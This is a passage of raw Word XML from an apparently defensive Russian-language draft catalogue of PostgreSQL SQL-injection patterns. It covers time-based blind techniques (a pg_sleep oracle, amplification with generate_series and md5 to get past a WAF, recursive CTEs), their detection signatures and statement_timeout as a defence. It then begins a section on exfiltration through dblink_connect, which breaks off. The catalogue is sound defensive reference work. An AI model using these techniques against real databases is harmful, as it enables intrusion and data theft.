        <w:t xml:space="preserve"> доступен любому пользователю, способному выполнять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247418B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG (рекурсивные CTE — с 8.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3CAD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Рекурсивные CTE применяются для обхода деревьев, графов, генерации последовательностей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E87438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Специфичный для time-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF35F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с условием остановки на большом числе (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i &lt; 1000000</w:t>
      </w:r>
      <w:r>
        <w:t>). Легитимные рекурсии останавливаются на десятках уровней, не миллионах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86830D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появляется в инъекционной точке, где раньше его не было.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E624A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Общие latency-сигнатуры — как в 3.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ED7F2E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573500CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.4.1, 3.4.2, 3.4.4, 3.10.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C59F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks: PostgreSQL injection — Time based; PortSwigger SQL injection cheat sheet; PostgreSQL Documentation: WITH Queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C439FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.4 `statement_timeout` как естественная защита</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF16FE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG имеет параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t>, прерывающий выполнение запроса по истечении заданного времени. Это не специальная защита от time-based, а общий механизм против тяжёлых запросов, но он напрямую ломает все варианты 3.4.1–3.4.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EFEB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Структура «уязвимого кода» — это конфигурация сервера, а не SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D6387" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C017B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = 0   # 0 = без ограничения (дефолт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315ADA6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт) backend выполняет любой запрос. При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = '5s'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой запрос, не уложившийся в 5 секунд, прерывается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: canceling statement due to statement timeout</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0579F5EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Эффект на time-based extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DBF0F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующему нужен надёжно различимый delay над baseline. При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = '5s'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB72CB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — успешно отрабатывает, oracle работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B0FD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(10)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — прерывается на 5-й секунде, latency всегда ~5 секунд, oracle ломается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DAACA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = '1s'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D5EF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — прерывается на 1-й секунде, oracle ломается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D06E8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(0.5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отрабатывает, но 500 мс над baseline 100 мс на границе различимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782D6AF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чем меньше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t>, тем более «шумный» oracle, и тем больше повторов нужно атакующему — это превращает практически осуществимую атаку в часы или дни.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C6BFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Правильный паттерн.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ставится на уровне БД (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER DATABASE</w:t>
      </w:r>
      <w:r>
        <w:t>), роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>), сессии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), или в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t>. Типичное продакшен-значение для OLTP — 5–30 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37773A26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Связанный параметр — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>idle_in_transaction_session_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закрывает оставленные открытыми транзакции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FEA5F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существует с PG 8.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31B1BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.4.1, 3.4.2, 3.4.3, 5.5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7BDAA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Documentation: Client Connection Defaults — statement_timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06800759" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A68A2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — базовый time-based oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F6D3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.2 Амплификация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход WAF на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DE79ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.3 Рекурсивный CTE — ещё один способ нагрузить backend без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF85ED9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как пассивная защита</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625B9E72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Использованные источники из research: нет — категория покрывается PG Docs и стандартными SQLi-cheat-sheet. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фигурирует в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проекта в детекторе time-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDA5FAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Статус документа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2794FE50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Это рабочая версия документа на момент сборки. Готовы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ECF8CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Раздел 1 — Введение (1.1–1.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331119ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Раздел 2 — Контекст PostgreSQL (2.1–2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C69F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Категория 3.1 — UNION-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07194262" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Категория 3.2 — Error-based через cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F14586E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Категория 3.3 — Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9161F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Категория 3.4 — Time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3667C05B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Не написаны: категории 3.5–3.17, раздел 4 (CVE), раздел 5 (защита), раздел 6 (приложения). Сборка в финальный документ — после написания всех разделов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B407F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.6.1 dblink_connect — TCP и DNS эксфильтрация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F60F04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает libpq-conninfo строкой и инициирует исходящий коннект к произвольному хосту от имени backend-процесса PostgreSQL. Поскольку libpq до любого TCP-handshake делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getaddrinfo(host)</w:t>
      </w:r>
      <w:r>
